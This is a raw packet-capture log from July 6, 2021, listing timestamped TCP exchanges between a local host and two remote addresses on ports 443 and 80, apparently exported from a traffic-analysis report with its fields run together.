                                                                                                                                                                                                  Jul 6, 2021 15:12:22.830353975 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.830549955 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.830576897 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.830852032 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.831702948 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.831952095 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.832868099 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.833329916 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.833365917 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.834096909 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.839587927 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.839627028 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.839653015 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.839677095 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.839700937 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.839724064 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.839744091 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.843554020 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.923661947 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.923696995 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.923712015 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.923727036 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.923855066 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.924891949 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.924916983 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.924932003 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.924948931 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.924963951 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.924967051 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.924981117 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.927092075 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.930351973 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.930397987 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.930417061 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.930428982 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.942594051 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:22.942627907 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.100532055 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.100564957 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.100697994 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.100769043 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.100847006 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.100891113 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.102092028 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.102117062 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.102616072 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.103831053 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.103854895 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.104068041 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.104129076 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.104146004 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.104249954 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.106579065 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.106604099 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.106622934 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.106647968 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.106667042 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.106688023 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.107671022 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.107695103 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.107898951 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.108696938 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.108716965 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.108910084 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.109890938 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.109915018 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.110104084 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.111052990 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.111077070 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.111175060 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.112329006 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.112358093 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.112411976 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.113548040 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.113569021 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.113625050 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.114593029 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.199357986 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.199393034 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.199697971 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.199827909 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.199858904 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.200411081 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.201347113 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.201368093 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.201481104 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.201819897 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.201838017 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.201916933 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.203186035 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.203203917 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.203295946 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.204541922 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.204562902 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.204674959 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.205308914 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.205336094 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.205415964 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.290998936 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291035891 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291070938 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291107893 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291153908 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291177034 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291212082 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291260958 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.291265965 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.292937040 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.292965889 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.293060064 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.293229103 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.293252945 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.293313026 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.294732094 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.294759989 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.294843912 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.295562983 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.295690060 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.295782089 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.379434109 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.379470110 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.379652023 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.380594969 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.380629063 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.380711079 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.382309914 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.382340908 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.382361889 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.382388115 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.382416964 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.382440090 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.383289099 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.383318901 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.383400917 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.384607077 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.384639025 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.384713888 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.385576010 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.385601997 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.385658026 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.469541073 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.469575882 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.469691038 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.470063925 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.470092058 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.470135927 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.471232891 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.471266985 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.471308947 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.472174883 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.472202063 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.472239971 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.473428965 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.473453999 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.473491907 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.474487066 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.474514961 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.474570990 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.476103067 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.476133108 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.476233006 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.559818029 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.559854031 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.560028076 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.560260057 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.560290098 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.560329914 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.563309908 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.563347101 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.563360929 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.563373089 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.563481092 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.564924002 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.564949036 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.564969063 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.564990044 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.565040112 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.566534996 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.566554070 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.566622019 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.649502993 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.649533987 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.649622917 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.649914026 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.650018930 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.650080919 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.651060104 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.651129961 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.651249886 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.654548883 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.654577017 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.654592037 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.654604912 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.654619932 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.654638052 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.654697895 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.656789064 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.656829119 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.656910896 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.656930923 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.657293081 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.657351017 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.659224987 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.659260035 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.659285069 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.659307957 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.659312963 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.659372091 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.660609007 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.660634041 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.660717964 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.661405087 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.661443949 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.661490917 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.662565947 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.662590981 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.662668943 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.704459906 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.739276886 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.739768982 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.739803076 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.739896059 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.741239071 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.741264105 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.741323948 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.741734982 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.741765976 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.741816044 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.742834091 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.742855072 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.742944002 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.744035959 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.744054079 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.744152069 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.888885021 CEST4916980192.168.2.22172.67.213.115
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.926949024 CEST8049169172.67.213.115192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.927110910 CEST4916980192.168.2.22172.67.213.115
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.927584887 CEST4916980192.168.2.22172.67.213.115
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.967201948 CEST8049169172.67.213.115192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:24.448312044 CEST8049169172.67.213.115192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:24.448345900 CEST8049169172.67.213.115192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:24.448510885 CEST4916980192.168.2.22172.67.213.115
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.147236109 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.186021090 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.186126947 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.191524029 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.233562946 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.234018087 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.234071016 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.234095097 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.234117985 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.234138012 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.246609926 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.277399063 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.315906048 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.316428900 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.518474102 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.838931084 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.877597094 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.991926908 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.991961002 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.991977930 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.991993904 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.992018938 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.992042065 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.082232952 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.082262039 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.082403898 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.082674980 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.082696915 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.082755089 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.083775997 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.083806992 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.084014893 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.084925890 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.084953070 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.085037947 CEST49170443192.168.2.2213.224.92.73
